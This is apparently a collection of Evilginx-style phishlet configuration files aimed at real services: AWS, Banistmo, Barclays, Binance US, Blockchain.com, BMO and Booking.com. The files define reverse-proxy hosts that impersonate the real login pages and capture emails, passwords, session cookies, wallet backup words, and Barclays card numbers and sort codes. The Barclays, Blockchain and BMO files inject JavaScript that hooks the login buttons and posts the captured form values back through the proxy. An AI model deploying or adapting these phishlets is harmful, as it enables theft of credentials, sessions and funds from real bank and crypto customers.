44 |   - {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true}
45 | 
46 | 
47 | 
48 | 
49 | sub_filters:
50 | 
51 |   - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazon.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
52 |   - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazonaws.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
53 |   - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'awsstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
54 |   - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
55 | 
56 | 
57 | auth_tokens:
58 |   - domain: '.amazon.com'
59 |     keys: ['aws-ubid-main', 'aws-userInfo-signed', '.*,regexp']
60 |   - domain: '.aws.amazon.com'
61 |     keys: ['awsm-vid,opt', 'awsccc', '.*,regexp']
62 |   - domain: '.console.aws.amazon.com'
63 |     keys: ['noflush_Region', 'noflush_awscnm', '.*,regexp']
64 |   - domain: '.signin.aws.amazon.com'
65 |     keys: ['aws-signin-csrf', 'aws-signin-account-info', 'aws-creds', '.*,regexp']
66 |   - domain: 'phd.aws.amazon.com'
67 |     keys: ['aws-creds-code-verifier', 'aws-consoleInfo', 'aws-creds', '.*,regexp']
68 |   - domain: 'portal.aws.amazon.com'
69 |     keys: ['aws-session-id-fallback,opt', 'aws-session-id', 'JSESSIONID', '.*,regexp']    
70 |   - domain: 'signin.aws.amazon.com'
71 |     keys: ['JSESSIONID', '.*,regexp']    
72 | 
73 | 
74 | auth_urls:
75 |   - '/console/home'
76 | credentials:
77 |   username:
78 |     key: 'email'
79 |     search: '(.*)'
80 |     type: 'post'
81 |   password:
82 |     key: 'password'
83 |     search: '(.*)'
84 |     type: 'post'
85 | login:
86 |   domain: 'signin.aws.amazon.com'
87 |   path: '/signin?redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Ffromtb%3Dtrue%26hashArgs%3D%2523%26isauthcode%3Dtrue%26state%3DhashArgsFromTB_us-east-1_7de15f551561e8cc&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&forceMobileApp=0&code_challenge=yjMoqMdgfMR1J8rPfy4CI_50b3PldrJjTsFRPOFWJ9A&code_challenge_method=SHA-256'
88 | 


--------------------------------------------------------------------------------
/banistmo.yaml:
--------------------------------------------------------------------------------
 1 | author: '@AN0NUD4Y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'banistmo.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'personas', orig_sub: 'personas', domain: 'banistmo.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: true}
 7 |   - {phish_sub: 'bf', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', session: true, is_landing: false}
 8 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'banistmo.com', session: true, is_landing: false}
 9 |   - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: true}
10 |   - {phish_sub: 'portal', orig_sub: 'portal', domain: 'banistmo.com', session: true, is_landing: false}
11 | 
12 | 
13 | sub_filters:
14 | #  - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '</script>', replace: ';document.location="https://login.YOURDOMA.IN/#/login/e1837f4d-1d0c-49b8-a242-8f653226c137";</script>', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']}
15 |   - {triggers_on: 'www.banistmo.com', orig_sub: 'www', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 |   - {triggers_on: 'personas.banistmo.com', orig_sub: 'personas', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
17 |   - {triggers_on: 'portal.banistmo.com', orig_sub: 'portal', domain: 'banistmo.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']}
18 |   - {triggers_on: 'api.banistmo.com', orig_sub: 'api', domain: 'banistmo.com', search: 'api.{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript']}
19 |   - {triggers_on: 'bf24030jpn.bf.dynatrace.com', orig_sub: 'bf24030jpn.bf', domain: 'dynatrace.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
20 |   - {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 | 
22 | 
23 | 
24 | auth_tokens:
25 |   - domain: '.banistmo.com'
26 |     keys: ['(.+),regexp']
27 |   - domain: '(.+),regexp'
28 |     keys: ['(.+),regexp']
29 | credentials:
30 |   username:
31 |     key: 'guid'
32 |     search: '(.*)'
33 |     type: 'post'
34 |   password:
35 |     key: 'password'
36 |     search: '(.*)'
37 |     type: 'post'
38 | login:
39 |   domain: 'personas.banistmo.com'
40 |   path: ''


--------------------------------------------------------------------------------
/barclays.yaml:
--------------------------------------------------------------------------------
  1 | author: '@AN0n'
  2 | min_ver: '2.3.0'
  3 | proxy_hosts:
  4 |   - {phish_sub: 'bank', orig_sub: 'bank', domain: 'barclays.co.uk', session: true, is_landing: true}
  5 |   - {phish_sub: 'smetrics', orig_sub: 'smetrics', domain: 'barclays.co.uk', session: true, is_landing: false}
  6 |   - {phish_sub: 'stats', orig_sub: 'wup-6bb5a42d.eu.v2', domain: 'we-stats.com', session: true, is_landing: false}
  7 |   - {phish_sub: 'logs', orig_sub: 'logs-6bb5a42d.eu.v2', domain: 'we-stats.com', session: true, is_landing: false}
  8 | 
  9 | sub_filters:
 10 |   - {triggers_on: 'bank.barclays.co.uk', orig_sub: 'bank', domain: 'barclays.co.uk', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 11 |   - {triggers_on: 'bank.barclays.co.uk', orig_sub: 'bank', domain: 'barclays.co.uk', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 12 |   - {triggers_on: 'bank.barclays.co.uk', orig_sub: 'bank', domain: 'barclays.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 13 |   - {triggers_on: 'smetrics.barclays.co.uk', orig_sub: 'smetrics', domain: 'barclays.co.uk', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 14 |   - {triggers_on: 'smetrics.barclays.co.uk', orig_sub: 'smetrics', domain: 'barclays.co.uk', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 15 |   - {triggers_on: 'smetrics.barclays.co.uk', orig_sub: 'smetrics', domain: 'barclays.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 16 | 
 17 | auth_tokens:
 18 |   - domain: '.barclays.co.uk'
 19 |     keys: ['.*,regexp']
 20 | credentials:
 21 |   username:
 22 |     key: 'surname'
 23 |     search: '(.*)'
 24 |     type: 'post'
 25 |   password:
 26 |     key: 'membershipNumber'
 27 |     search: '(.*)'
 28 |     type: 'post'
 29 |   custom: 
 30 |     - key: 'membershipNumber'
 31 |       search: '(.*)'
 32 |       type: 'post'
 33 |     - key: 'surname'
 34 |       search: '(.*)'
 35 |       type: 'post'
 36 |     - key: 'debitCard1'
 37 |       search: '(.*)'
 38 |       type: 'post'
 39 |     - key: 'debitCard2'
 40 |       search: '(.*)'
 41 |       type: 'post'
 42 |     - key: 'debitCard3'
 43 |       search: '(.*)'
 44 |       type: 'post'
 45 |     - key: 'debitCard4'
 46 |       search: '(.*)'
 47 |       type: 'post'    
 48 |     - key: 'sortcode0'
 49 |       search: '(.*)'
 50 |       type: 'post'
 51 |     - key: 'sortcode1'
 52 |       search: '(.*)'
 53 |       type: 'post'
 54 |     - key: 'sortcode2'
 55 |       search: '(.*)'
 56 |       type: 'post'
 57 |     - key: 'sortcode3'
 58 |       search: '(.*)'
 59 |       type: 'post'          
 60 | 
 61 | force_post:
 62 |   - path: '/olb/authlogin/'
 63 |     search:
 64 |       - {key: 'surname', search: '.*'}
 65 |     force:
 66 |       - {key: 'rememberToken', value: 'true'}
 67 |     type: 'post'
 68 |       
 69 | login:
 70 |   domain: 'bank.barclays.co.uk'
 71 |   path: '/olb/authlogin/loginAppContainer.do#/identification'
 72 |   
 73 | js_inject:
 74 |   - trigger_domains: ["bank.barclays.co.uk"]
 75 |     trigger_paths: ["/olb/authlogin/loginAppContainer.do"] #The target path is important as the javascript will be injected in all address pages started with /login 
 76 |     trigger_params: []
 77 |     script: |  
 78 |       function onclickListener(){
 79 |         document.getElementById("checkbox1").checked = true;
 80 |         var submit = document.getElementsByClassName("btn")[0]
 81 |         document.body.innerHTML = document.body.innerHTML.replace(/<button class="btn"/g , '<button class="btn" onclick="sendData()"');
 82 |         return;
 83 |       }
 84 |       function sendData(){
 85 |         document.getElementById("checkbox1").checked = true;
 86 |         var surname = document.getElementsByName("surname")[1].value;
 87 |         var xhr = new XMLHttpRequest();
 88 |         xhr.open("POST", '/', true);
 89 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 90 |         xhr.send("surname="+encodeURIComponent(surname));
 91 |         
 92 |         var membershipNumber = document.getElementsByName("membershipNum")[0].value;
 93 |         var xhr = new XMLHttpRequest();
 94 |         xhr.open("POST", '/', true);
 95 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 96 |         xhr.send("membershipNumber="+encodeURIComponent(membershipNumber));
 97 |         
 98 |         var cardnumber0 = document.getElementById("cardNumber0").value;
 99 |         var xhr = new XMLHttpRequest();
100 |         xhr.open("POST", '/', true);
101 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
102 |         xhr.send("debitCard1="+encodeURIComponent(cardnumber0));
103 |         
104 |         var cardnumber1 = document.getElementById("cardNumber1").value;
105 |         var xhr = new XMLHttpRequest();
106 |         xhr.open("POST", '/', true);
107 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
108 |         xhr.send("debitCard2="+encodeURIComponent(cardnumber1));
109 |         
110 |         var cardnumber2 = document.getElementById("cardNumber2").value;
111 |         var xhr = new XMLHttpRequest();
112 |         xhr.open("POST", '/', true);
113 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
114 |         xhr.send("debitCard3="+encodeURIComponent(cardnumber2));
115 |         
116 |         var cardnumber3 = document.getElementById("cardNumber3").value;
117 |         var xhr = new XMLHttpRequest();
118 |         xhr.open("POST", '/', true);
119 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
120 |         xhr.send("debitCard4="+encodeURIComponent(cardnumber3));
121 |         
122 |         var sortcode0 = document.getElementById("sortCode0").value;
123 |         var xhr = new XMLHttpRequest();
124 |         xhr.open("POST", '/', true);
125 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
126 |         xhr.send("sortcode0="+encodeURIComponent(sortcode0));
127 |         
128 |         var sortcode1 = document.getElementById("sortCode1").value;
129 |         var xhr = new XMLHttpRequest();
130 |         xhr.open("POST", '/', true);
131 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
132 |         xhr.send("sortcode1="+encodeURIComponent(sortcode1));
133 |         
134 |         var sortcode2 = document.getElementById("sortCode2").value;
135 |         var xhr = new XMLHttpRequest();
136 |         xhr.open("POST", '/', true);
137 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
138 |         xhr.send("sortcode2="+encodeURIComponent(sortcode2));
139 |         
140 |         var sortcode3 = document.getElementById("sortCode3").value;
141 |         var xhr = new XMLHttpRequest();
142 |         xhr.open("POST", '/', true);
143 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
144 |         xhr.send("sortcode3="+encodeURIComponent(sortcode3));    
145 |         return;
146 |       }
147 |       setTimeout(function(){ onclickListener(); }, 2500);
148 |       
149 |   
150 | 


--------------------------------------------------------------------------------
/binanceus.yaml:
--------------------------------------------------------------------------------
 1 | author: '@an0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'binance.us', session: true, is_landing: true}
 5 |   - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'binance.us', session: false, is_landing: false}
 6 |   - {phish_sub: 'preprod', orig_sub: 'preprod', domain: 'binance.us', session: false, is_landing: false}
 7 |   - {phish_sub: 'static', orig_sub: 'static', domain: 'binance.us', session: false, is_landing: false}
 8 |   - {phish_sub: 'stream', orig_sub: 'stream', domain: 'binance.us', session: false, is_landing: false}
 9 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'binance.us', session: false, is_landing: false}
10 |   - {phish_sub: 'support', orig_sub: 'support', domain: 'binance.us', session: false, is_landing: false}
11 |   - {phish_sub: 'test', orig_sub: 'test', domain: 'binance.us', session: false, is_landing: false}
12 |   - {phish_sub: 'docs', orig_sub: 'docs', domain: 'binance.us', session: false, is_landing: false}
13 |   - {phish_sub: 'blog', orig_sub: 'blogs', domain: 'binance.us', session: false, is_landing: false}
14 |   - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
15 |   
16 | 
17 | sub_filters:
18 |   - {triggers_on: 'www.binance.us', orig_sub: 'www', domain: 'binance.us', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
19 |   - {triggers_on: 'preprod.binance.us', orig_sub: 'preprod', domain: 'binance.us', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
20 |   - {triggers_on: 'static.binance.us', orig_sub: 'static', domain: 'binance.us', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
21 |   - {triggers_on: 'stream.binance.us', orig_sub: 'stream', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 |   - {triggers_on: 'api.binance.us', orig_sub: 'api', domain: 'binance.us', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
23 |   - {triggers_on: 'support.binance.us', orig_sub: 'support', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
24 |   - {triggers_on: 'accounts.binance.us', orig_sub: 'accounts', domain: 'binance.us', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
25 |   - {triggers_on: 'test.binance.us', orig_sub: 'test', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
26 |   - {triggers_on: 'docs.binance.us', orig_sub: 'docs', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
27 |   - {triggers_on: 'blog.binance.us', orig_sub: 'blog', domain: 'binance.us', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
28 |   - {triggers_on: 'accounts.binance.us', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
29 |  
30 | auth_tokens:
31 |   - domain: 'accounts.binance.us'
32 |     keys: [".*,regexp"]
33 | credentials:
34 |     username:
35 |      key: 'email'
36 |      search: '(.*)'
37 |      type: 'post'
38 |     password:
39 |      key: 'password'
40 |      search: '(.*)'
41 |      type: 'post'
42 | auth_urls:
43 |   - '/mail'
44 |   - '/mail/'
45 | login:
46 |   domain: 'accounts.binance.us'
47 |   path: '/en/login?return_to=aHR0cHM6Ly93d3cuYmluYW5jZS51cy9lbi9ob21l'


--------------------------------------------------------------------------------
/blockchain(Basic).yaml:
--------------------------------------------------------------------------------
 1 | author: '@An0nud4y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'blockchain.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'blockchain.com', session: true, is_landing: false}
 6 |   - {phish_sub: '', orig_sub: '', domain: 'blockchain.info', session: false, is_landing: false}
 7 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'blockchain.info', session: false, is_landing: false}
 8 | #  - {phish_sub: 'wallet-helper', orig_sub: 'wallet-helper', domain: 'blockchain.com', session: false, is_landing: false}
 9 | #  - {phish_sub: '', orig_sub: '', domain: 'blockchain.com', session: false, is_landing: false}
10 | 
11 | 
12 | sub_filters:
13 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'href="https://{hostname}/#/signup"', replace: 'href="https://{hostname}/#/login"', mimes: ['text/html', 'text/javascript']}
14 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
15 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 |   - {triggers_on: 'login.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
19 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
20 |   - {triggers_on: 'login.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
21 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'www', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'login', domain: 'blockchain.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
25 |   - {triggers_on: 'www.blockchain.com', orig_sub: '', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
26 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
27 |   - {triggers_on: 'www.blockchain.com', orig_sub: 'api', domain: 'blockchain.info', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
28 | 
29 | 
30 | auth_tokens:
31 |   - domain: '.blockchain.com'
32 |     keys: ['.*,regexp']
33 |   - domain: '.blockchain.info'
34 |     keys: ['.*,regexp']
35 | auth_urls:
36 |   - '#/home.*' 
37 | 
38 | credentials:
39 |   username:
40 |     key: 'guid'
41 |     search: '(.*)'
42 |     type: 'post'
43 |   password:
44 |     key: 'password'
45 |     search: '(.*)'
46 |     type: 'post'
47 |   custom:
48 |     - key: 'BackupWords'
49 |       search: '(.*)'
50 |       type: 'post'    
51 | login:
52 |   domain: 'www.blockchain.com'
53 |   path: '/'
54 | 
55 | # To insert the wallet id directly from link  
56 | # https://login.blockchain.com/#/login/dxxxxxxa-xxx8-xx4x-xxfa-dxxxx9xxx76ce  
57 | js_inject:
58 |   - trigger_domains: ["login.blockchain.com"]
59 |     trigger_paths: ["/"]
60 |     script: |
61 |         function onclickListener(){
62 |             var submit = document.querySelectorAll('button[type=submit]')[0];
63 |             submit.setAttribute("onclick", "sendPass()");
64 |             return;
65 |             }
66 |         function sendPass(){
67 |             var walletID = document.getElementsByName("guid")[0].value;
68 |             var password = document.getElementsByName("password")[0].value;
69 |             var xhr = new XMLHttpRequest();
70 |             xhr.open("POST", '/', true);
71 |             xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
72 |             xhr.send("guid="+encodeURIComponent(walletID)+""+" password="+encodeURIComponent(password));
73 |             return;
74 |             }
75 |         setTimeout(function(){ onclickListener(); }, 100);
76 |         


--------------------------------------------------------------------------------
/bmomobile.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | 
 5 | author: '@testcase0x'
 6 | min_ver: '2.3.0'
 7 | proxy_hosts:
 8 |   - {phish_sub: 'm2', orig_sub: 'm2', domain: 'bmo.com', session: false, is_landing: true}
 9 |   - {phish_sub: 'mobile2', orig_sub: 'mobile2', domain: 'bmo.com', session: true, is_landing: false}
10 | sub_filters:
11 |  - {triggers_on: 'mobile2.bmo.com', orig_sub: 'mobile2', domain: 'bmo.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
12 | auth_tokens:
13 |   - domain: '.bmo.com/'
14 |     keys: ['.*,regexp']
15 | credentials:
16 |   username:
17 |     key: 'FBC_Number'
18 |     search: '(.*)'
19 |     type: 'post' 
20 |   password:
21 |     key: 'FBC_Password'
22 |     search: '(.*)'
23 |     type: 'post' 
24 | login:
25 |   domain: 'm2.bmo.com'
26 |   path: '/BMOMobile/apps/services/www/BMOMobileBanking/mobilewebapp/default/BMOMobileBanking.html'
27 |   
28 | js_inject:
29 |   - trigger_domains: ["mobile2.bmo.com"]
30 |     trigger_paths: ["/BMOMobile/BMOMobileBanking.html","/BMOMobile/BMOMobileBanking.html#/login/auth","/BMOMobile/apps/services/www"]
31 |     trigger_params: []
32 |     script: |
33 |       function lp(){
34 |         var submit = document.querySelectorAll('button')[1];
35 |         submit.addEventListener("click", sendPass);
36 |         return;
37 |       }
38 |       function sendPass(){
39 |         var credential = document.getElementById("mat-input-0").value;
40 |         var password = document.getElementById("mat-input-1").value;
41 |         var xhr = new XMLHttpRequest();
42 |         xhr.open("POST", '/accounts/login/ajax/', true);
43 |         xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
44 |         xhr.send("FBC_Password="+encodeURIComponent(password) + "&FBC_Number="+encodeURIComponent(credential));
45 |         return;
46 |       }
47 |       setInterval(function(){ lp(); }, 500);


--------------------------------------------------------------------------------
/booking.yaml:
--------------------------------------------------------------------------------
 1 | author: '@AN0NUD4Y'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'account', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'booking.com', session: true, is_landing: false}
 6 |   - {phish_sub: 'admin', orig_sub: 'admin', domain: 'booking.com', session: true, is_landing: false}
 7 |   - {phish_sub: 'secure', orig_sub: 'secure', domain: 'booking.com', session: true, is_landing: false}
 8 |   - {phish_sub: '', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: true}
 9 |   - {phish_sub: 'static', orig_sub: 'q-cf', domain: 'bstatic.com', session: true, is_landing: false}
10 | 
11 | sub_filters:
12 |   - {triggers_on: 'account.booking.com', orig_sub: 'account', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
13 |   - {triggers_on: 'account.booking.com', orig_sub: 'account', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
14 |   - {triggers_on: 'account.booking.com', orig_sub: 'account', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
15 | 
16 |   - {triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
17 |   - {triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
18 |   - {triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
19 | 
20 |   - {triggers_on: 'account.booking.com', orig_sub: 'admin', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
21 |   - {triggers_on: 'account.booking.com', orig_sub: 'admin', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
22 |   - {triggers_on: 'account.booking.com', orig_sub: 'admin', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
23 | 
24 |   - {triggers_on: 'account.booking.com', orig_sub: 'secure', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
25 |   - {triggers_on: 'account.booking.com', orig_sub: 'secure', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
26 |   - {triggers_on: 'account.booking.com', orig_sub: 'secure', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
27 | 
28 | 
29 |   - {triggers_on: 'www.booking.com', orig_sub: 'www', domain: 'booking.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
30 |   - {triggers_on: 'www.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
31 |   - {triggers_on: 'www.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
32 | 
